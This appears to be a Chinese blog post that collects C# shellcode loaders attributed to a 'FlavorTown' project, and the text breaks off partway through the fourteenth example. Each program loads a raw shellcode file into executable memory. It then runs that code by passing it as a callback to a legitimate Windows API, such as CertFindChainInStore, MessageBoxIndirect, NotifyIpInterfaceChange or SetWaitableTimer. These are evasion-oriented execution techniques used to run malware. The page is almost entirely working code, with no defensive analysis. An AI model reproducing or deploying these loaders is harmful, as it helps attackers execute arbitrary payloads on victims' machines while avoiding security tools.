由于篇幅原因可以从gzh获取完整内容和下载链接:
回调函数注入(Callback Injection)实例汇总--50/91
1.回调函数注入 (C#) 通过 CertFindChainInStore
1// Wra7h\FlavorTown
2// Compile: Visual Studio 2022 & .NET Fx 3.5+
3
4using System;
5using System.Diagnostics;
6using System.Runtime.InteropServices;
7
8namespace CertFindChainInStore
9{
10 internal class Program
11 {
12 static void Main(string[] args)
13 {
14 if (args.Length < 1)
15 {
16 Console.WriteLine("\nNo shellcode specified.");
17 Console.WriteLine("Example Usage: CertFindChainInStore.exe C:\\Path\\To\\Raw\\Shellcode.bin\n");
18 System.Environment.Exit(1);
19 }
20
21 byte[] payload = System.IO.File.ReadAllBytes(args[0]);
22
23 IntPtr hAlloc = VirtualAlloc(
24 IntPtr.Zero,
25 (uint)payload.Length,
26 0x1000 /*COMMIT*/,
27 0x40 /*RWX*/);
28
29 Marshal.Copy(payload, 0, hAlloc, payload.Length);
30
31 uint oldProtect;
32 VirtualProtectEx(
33 Process.GetCurrentProcess().Handle,
34 hAlloc,
35 payload.Length,
36 0x20, //RX
37 out oldProtect);
38
39 IntPtr hCertStore = CertOpenSystemStore(0, "MY");
40
41 CERT_CHAIN_FIND_BY_ISSUER_PARA sCCFIP = new CERT_CHAIN_FIND_BY_ISSUER_PARA();
42 sCCFIP.pfnFindCallback = hAlloc;
43 sCCFIP.cbSize = (uint)Marshal.SizeOf(sCCFIP);
44
45 CertFindChainInStore(
46 hCertStore,
47 0x1,
48 0,
49 1,
50 ref sCCFIP,
51 IntPtr.Zero);
52
53 //Cleanup
54 CertCloseStore(hCertStore, 0);
55 }
56
57 [DllImport("kernel32")]
58 static extern IntPtr VirtualAlloc(
59 IntPtr lpAddress,
60 uint dwSize,
61 uint flAllocationType,
62 uint flProtect);
63
64 [DllImport("kernel32.dll")]
65 static extern bool VirtualProtectEx(
66 IntPtr hProcess,
67 IntPtr lpAddress,
68 int dwSize,
69 uint flNewProtect,
70 out uint lpflOldProtect);
71
72 [DllImport("crypt32.dll", CharSet = CharSet.Unicode)]
73 public static extern IntPtr CertOpenSystemStore(
74 uint hProv,
75 String szSubsystemProtocol
76 );
77
78 [DllImport("crypt32.dll", SetLastError = true)]
79 public static extern IntPtr CertFindChainInStore(
80 IntPtr hCertStore,
81 uint dwCertEncodingType,
82 uint dwFindFlags,
83 uint dwFindType,
84 ref CERT_CHAIN_FIND_BY_ISSUER_PARA pvFindPara,
85 IntPtr pPrevChainContext);
86
87 [DllImport("crypt32.dll", SetLastError = true)]
88 public static extern bool CertCloseStore(IntPtr storeProvider, int flags);
89
90 public struct CERT_CHAIN_FIND_BY_ISSUER_PARA
91 {
92 public uint cbSize;
93 public string pszUsageIdentifier;
94 public uint dwKeySpec;
95 public uint dwAcquirePrivateKeyFlags;
96 public uint cIssuer;
97 public IntPtr rgIssuer;
98 public IntPtr pfnFindCallback;
99 public IntPtr pvFindArg;
100 public uint dwIssuerChainIndex;
101 public uint dwIssuerElementIndex;
102 }
103 }
104}
2.回调函数注入 (C#) 通过 CopyFileTransacted
1// Wra7h\FlavorTown
2// Compile: Visual Studio 2022 & .NET Fx 3.5+
3
4using System;
5using System.Diagnostics;
6using System.Runtime.InteropServices;
7
8namespace CopyFileTransacted
9{
10 internal class Program
11 {
12 static void Main(string[] args)
13 {
14 if (args.Length < 1)
15 {
16 Console.WriteLine("\nNo shellcode specified.");
17 Console.WriteLine("Example Usage: CopyFileTransacted.exe C:\\Path\\To\\Raw\\Shellcode.bin\n");
18 System.Environment.Exit(1);
19 }
20
21 byte[] payload = System.IO.File.ReadAllBytes(args[0]);
22
23 IntPtr hAlloc = VirtualAlloc(
24 IntPtr.Zero,
25 (uint)payload.Length,
26 0x1000 /*COMMIT*/,
27 0x40 /*RWX*/);
28
29 Marshal.Copy(payload, 0, hAlloc, payload.Length);
30
31 uint oldProtect;
32 VirtualProtectEx(Process.GetCurrentProcess().Handle, hAlloc,
33 payload.Length, 0x20/*RX*/, out oldProtect);
34
35 string szTempFile = System.IO.Path.GetTempFileName();
36
37 IntPtr hTransaction = CreateTransaction(IntPtr.Zero, IntPtr.Zero, 0, 0, 0, 0, string.Empty);
38 CopyFileTransacted(@"C:\Windows\notepad.exe", szTempFile, hAlloc, IntPtr.Zero, 0, 0x0, hTransaction);
39
40 //Cleanup
41 System.IO.File.Delete(szTempFile);
42 CloseHandle(hTransaction);
43 }
44
45 [DllImport("kernel32")]
46 static extern IntPtr VirtualAlloc(
47 IntPtr lpAddress,
48 uint dwSize,
49 uint flAllocationType,
50 uint flProtect);
51
52 [DllImport("kernel32.dll")]
53 static extern bool VirtualProtectEx(
54 IntPtr hProcess,
55 IntPtr lpAddress,
56 int dwSize,
57 uint flNewProtect,
58 out uint lpflOldProtect);
59
60 [DllImport("KtmW32.dll")]
61 static extern IntPtr CreateTransaction(IntPtr lpTransactionAttributes, IntPtr UOW, uint CreateOptions, uint IsolationLevel, uint IsolationFlags, uint Timeout, string Description);
62
63 [DllImport("kernel32.dll")]
64 static extern bool CopyFileTransacted(string lpExistingFileName, string lpNewFileName,
65 IntPtr lpProgressRoutine, IntPtr lpData, Int32 pbCancel,
66 uint dwCopyFlags, IntPtr hTransaction);
67
68 [DllImport("kernel32.dll")]
69 static extern bool CloseHandle(IntPtr hObject);
70 }
71}
3.回调函数注入 (C#) 通过 DSA_EnumCallback
1// Wra7h\FlavorTown
2// Compile: Visual Studio 2022 & .NET Fx 3.5+
3
4using System;
5using System.Diagnostics;
6using System.Runtime.InteropServices;
7
8namespace DSA_EnumCallback
9{
10 internal class Program
11 {
12 static void Main(string[] args)
13 {
14 if (args.Length < 1)
15 {
16 Console.WriteLine("\nNo shellcode specified.");
17 Console.WriteLine("Example Usage: DSA_EnumCallback.exe C:\\Path\\To\\Raw\\Shellcode.bin\n");
18 System.Environment.Exit(1);
19 }
20
21 byte[] payload = System.IO.File.ReadAllBytes(args[0]);
22
23 IntPtr hAlloc = VirtualAlloc(
24 IntPtr.Zero,
25 (uint)payload.Length,
26 0x1000 /*COMMIT*/,
27 0x40 /*RWX*/);
28
29 Marshal.Copy(payload, 0, hAlloc, payload.Length);
30
31 uint oldProtect;
32 VirtualProtectEx(
33 Process.GetCurrentProcess().Handle,
34 hAlloc,
35 payload.Length,
36 0x20, //RX
37 out oldProtect);
38
39 IntPtr hDSA = DSA_Create(1, 1);
40
41 DSA_InsertItem(hDSA, 0x7fffffff, hDSA); //Append
42
43 DSA_EnumCallback(hDSA, hAlloc, IntPtr.Zero);
44
45 DSA_Destroy(hDSA);
46 }
47
48 [DllImport("kernel32")]
49 static extern IntPtr VirtualAlloc(
50 IntPtr lpAddress,
51 uint dwSize,
52 uint flAllocationType,
53 uint flProtect);
54
55 [DllImport("kernel32.dll")]
56 static extern bool VirtualProtectEx(
57 IntPtr hProcess,
58 IntPtr lpAddress,
59 int dwSize,
60 uint flNewProtect,
61 out uint lpflOldProtect);
62
63 [DllImport("Comctl32.dll")]
64 static extern IntPtr DSA_Create(
65 int cbItem,
66 int cItemGrow);
67
68 [DllImport("Comctl32.dll")]
69 static extern void DSA_InsertItem(
70 IntPtr hdsa,
71 int i,
72 IntPtr pItem);
73
74 [DllImport("Comctl32.dll")]
75 static extern void DSA_EnumCallback(
76 IntPtr hdsa,
77 IntPtr pfnCB,
78 IntPtr pData);
79
80 [DllImport("Comctl32.dll")]
81 static extern bool DSA_Destroy(IntPtr hdsa);
82 }
83}
4.回调函数注入 (C#) 通过 EncryptedFileRaw
1// Wra7h\FlavorTown
2// Compile: Visual Studio 2022 & .NET Fx 3.5+
3
4using System;
5using System.Diagnostics;
6using System.Runtime.InteropServices;
7
8namespace EncryptedFileRaw
9{
10 internal class Program
11 {
12 static void Main(string[] args)
13 {
14 if (args.Length < 1)
15 {
16 Console.WriteLine("\nNo shellcode specified.");
17 Console.WriteLine("Example Usage: EncryptedFileRaw.exe C:\\Path\\To\\Raw\\Shellcode.bin\n");
18 System.Environment.Exit(1);
19 }
20
21 byte[] payload = System.IO.File.ReadAllBytes(args[0]);
22
23 IntPtr hAlloc = VirtualAlloc(
24 IntPtr.Zero,
25 (uint)payload.Length,
26 0x1000 /*COMMIT*/,
27 0x40 /*RWX*/);
28
29 Marshal.Copy(payload, 0, hAlloc, payload.Length);
30
31 uint oldProtect;
32 VirtualProtectEx(
33 Process.GetCurrentProcess().Handle,
34 hAlloc,
35 payload.Length,
36 0x20, //RX
37 out oldProtect);
38
39 IntPtr pvContext = IntPtr.Zero;
40 ulong CREATE_FOR_IMPORT = 1;
41 OpenEncryptedFileRaw(System.IO.Path.GetTempFileName(), CREATE_FOR_IMPORT, out pvContext);
42 WriteEncryptedFileRaw(hAlloc, IntPtr.Zero, pvContext);
43 }
44
45 [DllImport("kernel32")]
46 public static extern IntPtr VirtualAlloc(
47 IntPtr lpAddress,
48 uint dwSize,
49 uint flAllocationType,
50 uint flProtect);
51
52 [DllImport("kernel32.dll")]
53 static extern bool VirtualProtectEx(
54 IntPtr hProcess,
55 IntPtr lpAddress,
56 int dwSize,
57 uint flNewProtect,
58 out uint lpflOldProtect);
59
60 [DllImport("Advapi32.dll")]
61 static extern uint OpenEncryptedFileRaw(
62 string lpFilename,
63 ulong ulFlags,
64 out IntPtr pvContext);
65
66 [DllImport("Advapi32.dll")]
67 static extern uint WriteEncryptedFileRaw(
68 IntPtr pfImportCallback,
69 IntPtr pvCallbackContext,
70 IntPtr pvContext);
71 }
72}
5.回调函数注入 (C#) 通过 EvtSubscribe_CVEEventWrite
1// Wra7h\FlavorTown
2// Compile: Visual Studio 2022 & .NET Fx 3.5+
3
4using System;
5using System.Diagnostics;
6using System.Runtime.InteropServices;
7
8namespace EvtSubscribe_CVEEventWrite
9{
10 internal class Program
11 {
12 static void Main(string[] args)
13 {
14 if (args.Length < 1)
15 {
16 Console.WriteLine("\nNo shellcode specified.");
17 Console.WriteLine("Example Usage: EvtSubscribe_CVEEventWrite.exe C:\\Path\\To\\Raw\\Shellcode.bin\n");
18 System.Environment.Exit(1);
19 }
20
21 byte[] payload = System.IO.File.ReadAllBytes(args[0]);
22
23 IntPtr hAlloc = VirtualAlloc(
24 IntPtr.Zero,
25 (uint)payload.Length,
26 0x1000 /*COMMIT*/,
27 0x40 /*RWX*/);
28
29 Marshal.Copy(payload, 0, hAlloc, payload.Length);
30
31 uint oldProtect;
32 VirtualProtectEx(
33 Process.GetCurrentProcess().Handle,
34 hAlloc,
35 payload.Length,
36 0x20, //RX
37 out oldProtect);
38
39 uint EvtSubscribeToFutureEvents = 1;
40 IntPtr hEvent = EvtSubscribe(IntPtr.Zero, IntPtr.Zero, "Application", "*[System/EventID=1]", IntPtr.Zero, IntPtr.Zero, hAlloc, EvtSubscribeToFutureEvents);
41 long test = CveEventWrite("2022-123456", "Wra7h");
42 System.Threading.Thread.Sleep(10000);
43 EvtClose(hEvent);
44 }
45
46 [DllImport("kernel32")]
47 static extern IntPtr VirtualAlloc(
48 IntPtr lpAddress,
49 uint dwSize,
50 uint flAllocationType,
51 uint flProtect);
52
53 [DllImport("kernel32.dll")]
54 static extern bool VirtualProtectEx(
55 IntPtr hProcess,
56 IntPtr lpAddress,
57 int dwSize,
58 uint flNewProtect,
59 out uint lpflOldProtect);
60
61 [DllImport("Wevtapi.dll")]
62 static extern IntPtr EvtSubscribe(
63 IntPtr hSession,
64 IntPtr SignalEvent,
65 [MarshalAs(UnmanagedType.LPWStr)] string ChannelPath,
66 [MarshalAs(UnmanagedType.LPWStr)] string Query,
67 IntPtr Bookmark,
68 IntPtr Context,
69 IntPtr Callback,
70 uint Flags);
71
72 [DllImport("Advapi32.dll")]
73 static extern long CveEventWrite(string CveId, string AdditionalDetails);
74
75 [DllImport("Wevtapi.dll")]
76 static extern bool EvtClose(IntPtr hEvent);
77 }
78}
6.回调函数注入 (C#) 通过 MFAddPeriodicCallback
1// Wra7h\FlavorTown
2// Compile: Visual Studio 2022 & .NET Fx 3.5+
3
4using System;
5using System.Diagnostics;
6using System.Runtime.InteropServices;
7
8namespace MFAddPeriodicCallback
9{
10 internal class Program
11 {
12 static void Main(string[] args)
13 {
14 if (args.Length < 1)
15 {
16 Console.WriteLine("\nNo shellcode specified.");
17 Console.WriteLine("Example Usage: MFAddPeriodicCallback.exe C:\\Path\\To\\Raw\\Shellcode.bin\n");
18 System.Environment.Exit(1);
19 }
20
21 byte[] payload = System.IO.File.ReadAllBytes(args[0]);
22
23 IntPtr hAlloc = VirtualAlloc(
24 IntPtr.Zero,
25 (uint)payload.Length,
26 0x1000 /*COMMIT*/,
27 0x40 /*RWX*/);
28
29 Marshal.Copy(payload, 0, hAlloc, payload.Length);
30
31 uint oldProtect;
32 VirtualProtectEx(
33 Process.GetCurrentProcess().Handle,
34 hAlloc,
35 payload.Length,
36 0x20, //RX
37 out oldProtect);
38
39 MFStartup(0x0002 << 16 | 0x0070, 0x1);
40
41 uint dwKey = 0;
42 MFAddPeriodicCallback(hAlloc, IntPtr.Zero, out dwKey);
43
44 System.Threading.Thread.Sleep(1000);
45
46 MFShutdown();
47
48 }
49
50 [DllImport("kernel32")]
51 static extern IntPtr VirtualAlloc(
52 IntPtr lpAddress,
53 uint dwSize,
54 uint flAllocationType,
55 uint flProtect);
56
57 [DllImport("kernel32.dll")]
58 static extern bool VirtualProtectEx(
59 IntPtr hProcess,
60 IntPtr lpAddress,
61 int dwSize,
62 uint flNewProtect,
63 out uint lpflOldProtect);
64
65 [DllImport("Mfplat.dll", SetLastError = true)]
66 static extern uint MFStartup(
67 ulong Version,
68 uint dwFlags);
69
70 [DllImport("Mfplat.dll", SetLastError = true)]
71 static extern uint MFAddPeriodicCallback(
72 IntPtr Callback,
73 IntPtr pContext,
74 out uint dwKey);
75
76 [DllImport("Mfplat.dll", SetLastError = true)]
77 static extern IntPtr MFShutdown();
78
79 }
80}
7.回调函数注入 (C#) 通过 MessageBoxIndirect
1// Wra7h\FlavorTown
2// Compile: Visual Studio 2022 & .NET Fx 3.5+
3
4using System;
5using System.IO;
6using System.Diagnostics;
7using System.Runtime.InteropServices;
8
9namespace MessageBoxIndirect
10{
11 class Program
12 {
13 static void Main(string[] args)
14 {
15 if (args.Length < 1)
16 {
17 Console.WriteLine("\nNo shellcode specified.");
18 Console.WriteLine("Example Usage: MessageBoxIndirect.exe C:\\Path\\To\\Raw\\Shellcode.bin\n");
19 System.Environment.Exit(1);
20 }
21
22 byte[] payload = File.ReadAllBytes(args[0]);
23
24 IntPtr hAlloc = VirtualAlloc(
25 IntPtr.Zero,
26 (uint)payload.Length,
27 0x1000 /*COMMIT*/,
28 0x40 /*RWX*/);
29
30 Marshal.Copy(payload, 0, hAlloc, payload.Length);
31
32 uint oldProtect;
33 VirtualProtectEx(
34 Process.GetCurrentProcess().Handle,
35 hAlloc,
36 payload.Length,
37 0x20, //RX
38 out oldProtect);
39
40 MSGBOXPARAMS sMsgBoxParams = new MSGBOXPARAMS();
41 sMsgBoxParams.dwStyle = (uint)(0x00004000L); // Should have an ok button and a help button
42 sMsgBoxParams.lpfnMsgBoxCallback = hAlloc;
43 sMsgBoxParams.lpszText = "Click help for shellcode!";
44 sMsgBoxParams.cbSize = (uint)Marshal.SizeOf(sMsgBoxParams);
45
46 MessageBoxIndirect(sMsgBoxParams);
47 }
48
49 [DllImport("kernel32")]
50 static extern IntPtr VirtualAlloc(
51 IntPtr lpAddress,
52 uint dwSize,
53 uint flAllocationType,
54 uint flProtect);
55
56 [DllImport("kernel32.dll")]
57 static extern bool VirtualProtectEx(
58 IntPtr hProcess,
59 IntPtr lpAddress,
60 int dwSize,
61 uint flNewProtect,
62 out uint lpflOldProtect);
63
64 [DllImport("user32.dll", SetLastError = true, CharSet = CharSet.Auto)]
65 public static extern int MessageBoxIndirect(MSGBOXPARAMS lbmp);
66
67 [StructLayout(LayoutKind.Sequential)]
68 public struct MSGBOXPARAMS
69 {
70 public uint cbSize;
71 public IntPtr hwndOwner;
72 public IntPtr hInstance;
73 [MarshalAs(UnmanagedType.LPWStr)] public string lpszText;
74 [MarshalAs(UnmanagedType.LPWStr)] public string lpszCaption;
75 public uint dwStyle;
76 public IntPtr lpszIcon;
77 public IntPtr dwContextHelpId;
78 public IntPtr lpfnMsgBoxCallback;
79 public uint dwLanguageId;
80 }
81 }
82}
8.回调函数注入 (C#) 通过 NotifyIpInterfaceChange
1// Wra7h\FlavorTown
2// Compile: Visual Studio 2022 & .NET Fx 3.5+
3
4using System;
5using System.Diagnostics;
6using System.Runtime.InteropServices;
7
8namespace NotifyIpInterfaceChange
9{
10 internal class Program
11 {
12 static void Main(string[] args)
13 {
14 if (args.Length < 1)
15 {
16 Console.WriteLine("\nNo shellcode specified.");
17 Console.WriteLine("Example Usage: NotifyIpInterfaceChange.exe C:\\Path\\To\\Raw\\Shellcode.bin\n");
18 System.Environment.Exit(1);
19 }
20
21 byte[] payload = System.IO.File.ReadAllBytes(args[0]);
22
23 IntPtr hAlloc = VirtualAlloc(
24 IntPtr.Zero,
25 (uint)payload.Length,
26 0x1000 /*COMMIT*/,
27 0x40 /*RWX*/);
28
29 Marshal.Copy(payload, 0, hAlloc, payload.Length);
30
31 uint oldProtect;
32 VirtualProtectEx(
33 Process.GetCurrentProcess().Handle,
34 hAlloc,
35 payload.Length,
36 0x20, //RX
37 out oldProtect);
38
39 uint AF_UNSPEC = 0x0;
40 IntPtr hNotification = IntPtr.Zero;
41 NotifyIpInterfaceChange(AF_UNSPEC, hAlloc, IntPtr.Zero, true, ref hNotification);
42 }
43
44 [DllImport("kernel32")]
45 static extern IntPtr VirtualAlloc(
46 IntPtr lpAddress,
47 uint dwSize,
48 uint flAllocationType,
49 uint flProtect);
50
51 [DllImport("kernel32.dll")]
52 static extern bool VirtualProtectEx(
53 IntPtr hProcess,
54 IntPtr lpAddress,
55 int dwSize,
56 uint flNewProtect,
57 out uint lpflOldProtect);
58
59 [DllImport("Iphlpapi.dll")]
60 static extern IntPtr NotifyIpInterfaceChange(
61 uint Family,
62 IntPtr Callback,
63 IntPtr CallerContext,
64 bool InitialNotification,
65 ref IntPtr NotificationHandle);
66
67 }
68}
9.回调函数注入 (C#) 通过 NotifyRouteChange2
1// Wra7h\FlavorTown
2// Compile: Visual Studio 2022 & .NET Fx 3.5+
3
4using System;
5using System.Diagnostics;
6using System.Runtime.InteropServices;
7
8namespace NotifyRouteChange2
9{
10 internal class Program
11 {
12 static void Main(string[] args)
13 {
14 if (args.Length < 1)
15 {
16 Console.WriteLine("\nNo shellcode specified.");
17 Console.WriteLine("Example Usage: NotifyRouteChange2.exe C:\\Path\\To\\Raw\\Shellcode.bin\n");
18 System.Environment.Exit(1);
19 }
20
21 byte[] payload = System.IO.File.ReadAllBytes(args[0]);
22
23 IntPtr hAlloc = VirtualAlloc(
24 IntPtr.Zero,
25 (uint)payload.Length,
26 0x1000 /*COMMIT*/,
27 0x40 /*RWX*/);
28
29 Marshal.Copy(payload, 0, hAlloc, payload.Length);
30
31 uint oldProtect;
32 VirtualProtectEx(Process.GetCurrentProcess().Handle, hAlloc,
33 payload.Length, 0x20/*RX*/, out oldProtect);
34
35 uint AF_INET = 0x2;
36 IntPtr hNotification = IntPtr.Zero;
37 NotifyRouteChange2(AF_INET, hAlloc, IntPtr.Zero, true, ref hNotification);
38 }
39
40 [DllImport("kernel32")]
41 static extern IntPtr VirtualAlloc(
42 IntPtr lpAddress,
43 uint dwSize,
44 uint flAllocationType,
45 uint flProtect);
46
47 [DllImport("kernel32.dll")]
48 static extern bool VirtualProtectEx(
49 IntPtr hProcess,
50 IntPtr lpAddress,
51 int dwSize,
52 uint flNewProtect,
53 out uint lpflOldProtect);
54
55 [DllImport("Iphlpapi.dll")]
56 static extern IntPtr NotifyRouteChange2(
57 uint AddressFamily,
58 IntPtr Callback,
59 IntPtr CallerContext,
60 bool InitialNotification,
61 ref IntPtr NotificationHandle);
62
63 }
64}
10.回调函数注入 (C#) 通过 NotifyTeredoPortChange
1// Wra7h\FlavorTown
2// Compile: Visual Studio 2022 & .NET Fx 3.5+
3
4using System;
5using System.Diagnostics;
6using System.Runtime.InteropServices;
7
8namespace NotifyTeredoPortChange
9{
10 internal class Program
11 {
12 static void Main(string[] args)
13 {
14 if (args.Length < 1)
15 {
16 Console.WriteLine("\nNo shellcode specified.");
17 Console.WriteLine("Example Usage: NotifyTeredoPortChange.exe C:\\Path\\To\\Raw\\Shellcode.bin\n");
18 System.Environment.Exit(1);
19 }
20
21 byte[] payload = System.IO.File.ReadAllBytes(args[0]);
22
23 IntPtr hAlloc = VirtualAlloc(
24 IntPtr.Zero,
25 (uint)payload.Length,
26 0x1000 /*COMMIT*/,
27 0x40 /*RWX*/);
28
29 Marshal.Copy(payload, 0, hAlloc, payload.Length);
30
31 uint oldProtect;
32 VirtualProtectEx(Process.GetCurrentProcess().Handle, hAlloc,
33 payload.Length, 0x20/*RX*/, out oldProtect);
34
35 IntPtr hNotification = IntPtr.Zero;
36 NotifyTeredoPortChange(hAlloc, IntPtr.Zero, true, ref hNotification);
37 }
38
39 [DllImport("kernel32")]
40 static extern IntPtr VirtualAlloc(
41 IntPtr lpAddress,
42 uint dwSize,
43 uint flAllocationType,
44 uint flProtect);
45
46 [DllImport("kernel32.dll")]
47 static extern bool VirtualProtectEx(
48 IntPtr hProcess,
49 IntPtr lpAddress,
50 int dwSize,
51 uint flNewProtect,
52 out uint lpflOldProtect);
53
54 [DllImport("Iphlpapi.dll")]
55 static extern IntPtr NotifyTeredoPortChange(
56 IntPtr Callback,
57 IntPtr CallerContext,
58 bool InitialNotification,
59 ref IntPtr NotificationHandle);
60
61 }
62}
11.回调函数注入 (C#) 通过 NotifyUnicastIpAddressChange
1// Wra7h\FlavorTown
2// Compile: Visual Studio 2022 & .NET Fx 3.5+
3
4using System;
5using System.Diagnostics;
6using System.Runtime.InteropServices;
7
8namespace NotifyUnicastIpAddressChange
9{
10 internal class Program
11 {
12 static void Main(string[] args)
13 {
14 if (args.Length < 1)
15 {
16 Console.WriteLine("\nNo shellcode specified.");
17 Console.WriteLine("Example Usage: NotifyUnicastIpAddressChange.exe C:\\Path\\To\\Raw\\Shellcode.bin\n");
18 System.Environment.Exit(1);
19 }
20
21 byte[] payload = System.IO.File.ReadAllBytes(args[0]);
22
23 IntPtr hAlloc = VirtualAlloc(
24 IntPtr.Zero,
25 (uint)payload.Length,
26 0x1000 /*COMMIT*/,
27 0x40 /*RWX*/);
28
29 Marshal.Copy(payload, 0, hAlloc, payload.Length);
30
31 uint oldProtect;
32 VirtualProtectEx(
33 Process.GetCurrentProcess().Handle,
34 hAlloc,
35 payload.Length,
36 0x20, //RX
37 out oldProtect);
38
39 IntPtr hNotification = IntPtr.Zero;
40 uint AF_INET = 2;
41 NotifyUnicastIpAddressChange(AF_INET, hAlloc, IntPtr.Zero, true, ref hNotification);
42 }
43
44 [DllImport("kernel32")]
45 static extern IntPtr VirtualAlloc(
46 IntPtr lpAddress,
47 uint dwSize,
48 uint flAllocationType,
49 uint flProtect);
50
51 [DllImport("kernel32.dll")]
52 static extern bool VirtualProtectEx(
53 IntPtr hProcess,
54 IntPtr lpAddress,
55 int dwSize,
56 uint flNewProtect,
57 out uint lpflOldProtect);
58
59 [DllImport("Iphlpapi.dll")]
60 static extern IntPtr NotifyUnicastIpAddressChange(
61 uint Family,
62 IntPtr Callback,
63 IntPtr CallerContext,
64 bool InitialNotification,
65 ref IntPtr NotificationHandle);
66 }
67}
12.回调函数注入 (C#) 通过 PerfStartProviderEx
1// Wra7h\FlavorTown
2// Compile: Visual Studio 2022 & .NET Fx 3.5+
3
4using System;
5using System.Diagnostics;
6using System.Runtime.InteropServices;
7
8namespace PerfStartProviderEx
9{
10 internal class Program
11 {
12 static void Main(string[] args)
13 {
14 if (args.Length < 1)
15 {
16 Console.WriteLine("\nNo shellcode specified.");
17 Console.WriteLine("Example Usage: PerfStartProviderEx.exe C:\\Path\\To\\Raw\\Shellcode.bin\n");
18 System.Environment.Exit(1);
19 }
20
21 byte[] payload = System.IO.File.ReadAllBytes(args[0]);
22
23 IntPtr hAlloc = VirtualAlloc(
24 IntPtr.Zero,
25 (uint)payload.Length,
26 0x1000 /*COMMIT*/,
27 0x40 /*RWX*/);
28
29 Marshal.Copy(payload, 0, hAlloc, payload.Length);
30
31 uint oldProtect;
32 VirtualProtectEx(
33 Process.GetCurrentProcess().Handle,
34 hAlloc,
35 payload.Length,
36 0x20, //RX
37 out oldProtect);
38
39 Guid ProviderGuid = Guid.NewGuid();
40
41 PERF_PROVIDER_CONTEXT sPPC = new PERF_PROVIDER_CONTEXT();
42 sPPC.MemAllocRoutine = hAlloc;
43 sPPC.ContextSize = (uint)Marshal.SizeOf(sPPC);
44
45 IntPtr hProvider = IntPtr.Zero;
46 PerfStartProviderEx(ref ProviderGuid, ref sPPC, out hProvider);
47
48 //Close provider handle
49 PerfStopProvider(hProvider);
50 }
51
52 [DllImport("kernel32")]
53 static extern IntPtr VirtualAlloc(
54 IntPtr lpAddress,
55 uint dwSize,
56 uint flAllocationType,
57 uint flProtect);
58
59 [DllImport("kernel32.dll")]
60 static extern bool VirtualProtectEx(
61 IntPtr hProcess,
62 IntPtr lpAddress,
63 int dwSize,
64 uint flNewProtect,
65 out uint lpflOldProtect);
66
67 [DllImport("advapi32.dll")]
68 static extern ulong PerfStartProviderEx(
69 ref Guid ProviderGuid,
70 ref PERF_PROVIDER_CONTEXT ProviderContext,
71 out IntPtr hProvider);
72
73 [DllImport("advapi32.dll")]
74 static extern ulong PerfStopProvider(IntPtr hProvider);
75
76 struct PERF_PROVIDER_CONTEXT
77 {
78 public uint ContextSize;
79 public uint Reserved;
80 public IntPtr ControlCallback;
81 public IntPtr MemAllocRoutine;
82 public IntPtr MemFreeRoutine;
83 public IntPtr pMemContext;
84 }
85
86 }
87}
13.回调函数注入 (C#) 通过 RegisterWaitForSingleObject
1// Wra7h\FlavorTown
2// Compile: Visual Studio 2022 & .NET Fx 3.5+
3
4using System;
5using System.Diagnostics;
6using System.Runtime.InteropServices;
7
8namespace RegisterWaitForSingleObject
9{
10 internal class Program
11 {
12 static void Main(string[] args)
13 {
14 if (args.Length < 1)
15 {
16 Console.WriteLine("\nNo shellcode specified.");
17 Console.WriteLine("Example Usage: RegisterWaitForSingleObject.exe C:\\Path\\To\\Raw\\Shellcode.bin\n");
18 System.Environment.Exit(1);
19 }
20 byte[] payload = System.IO.File.ReadAllBytes(args[0]);
21
22 IntPtr hAlloc = VirtualAlloc(
23 IntPtr.Zero,
24 (uint)payload.Length,
25 0x1000 /*COMMIT*/,
26 0x40 /*RWX*/);
27 Marshal.Copy(payload, 0, hAlloc, payload.Length);
28 uint oldProtect;
29 VirtualProtectEx(
30 Process.GetCurrentProcess().Handle,
31 hAlloc,
32 payload.Length,
33 0x20, //RX
34 out oldProtect);
35
36 IntPtr NewWaitObj = IntPtr.Zero;
37 ulong WT_EXECUTEONLYONCE = 0x8;
38 RegisterWaitForSingleObject(out NewWaitObj, Process.GetCurrentProcess().Handle, hAlloc, IntPtr.Zero, 0, WT_EXECUTEONLYONCE);
39 Sleep(1000);
40 }
41
42 [DllImport("kernel32")]
43 public static extern IntPtr VirtualAlloc(
44 IntPtr lpAddress,
45 uint dwSize,
46 uint flAllocationType,
47 uint flProtect);
48
49 [DllImport("kernel32.dll")]
50 static extern bool VirtualProtectEx(
51 IntPtr hProcess,
52 IntPtr lpAddress,
53 int dwSize,
54 uint flNewProtect,
55 out uint lpflOldProtect);
56
57 [DllImport("Kernel32.dll")]
58 static extern IntPtr RegisterWaitForSingleObject(
59 out IntPtr phNewWaitObject,
60 IntPtr hObject,
61 IntPtr Callback,
62 IntPtr Context,
63 ulong dwMilliseconds,
64 ulong dwFlags);
65
66 [DllImport("kernel32")]
67 static extern void Sleep(int milliseconds);
68 }
69}
14.回调函数注入 (C#) 通过 SetWaitableTimer
1// Wra7h\FlavorTown
2// Compile: Visual Studio 2022 & .NET Fx 3.5+
3
4using System;
5using System.Diagnostics;
6using System.Runtime.InteropServices;
7
8namespace SetWaitableTimer
9{
10 internal class Program
11 {
12 static void Main(string[] args)
13 {
14 if (args.Length < 1)
15 {
16 Console.WriteLine("\nNo shellcode specified.");
17 Console.WriteLine("Example Usage: SetWaitableTimer.exe C:\\Path\\To\\Raw\\Shellcode.bin\n");
18 System.Environment.Exit(1);
19 }
20
21 byte[] payload = System.IO.File.ReadAllBytes(args[0]);
22
23 IntPtr hAlloc = VirtualAlloc(
24 IntPtr.Zero,
25 (uint)payload.Length,
26 0x1000 /*COMMIT*/,
27 0x40 /*RWX*/);
28
29 Marshal.Copy(payload, 0, hAlloc, payload.Length);
30
31 uint oldProtect;
32 VirtualProtectEx(
33 Process.GetCurrentProcess().Handle,
34 hAlloc,
35 payload.Length,
36 0x20, //RX
37 out oldProtect);
38
39 IntPtr hTimer = CreateWaitableTimer(IntPtr.Zero, false, string.Empty);
40 LARGE_INTEGER sLI = new LARGE_INTEGER();
41 SetWaitableTimer(hTimer, ref sLI,
42 0, hAlloc, IntPtr.Zero, false);
43
44 SleepEx(1000, true);
45 }
46
47 [DllImport("kernel32")]
48 static extern IntPtr VirtualAlloc(
49 IntPtr lpAddress,
50 uint dwSize,
51 uint flAllocationType,
52 uint flProtect);
53
54 [DllImport("kernel32.dll")]
55 static extern bool VirtualProtectEx(
56 IntPtr hProcess,
57 IntPtr lpAddress,
58 int dwSize,
59 uint flNewProtect,
60 out uint lpflOldProtect);
61
62 [DllImport("kernel32.dll")]
63 static extern IntPtr CreateWaitableTimer(
64 IntPtr lpTimerAttributes,
65 bool bManualReset,
66 string lpTimerName);
67
68 [StructLayout(LayoutKind.Explicit, Size = 8)]
69 struct LARGE_INTEGER
70 {
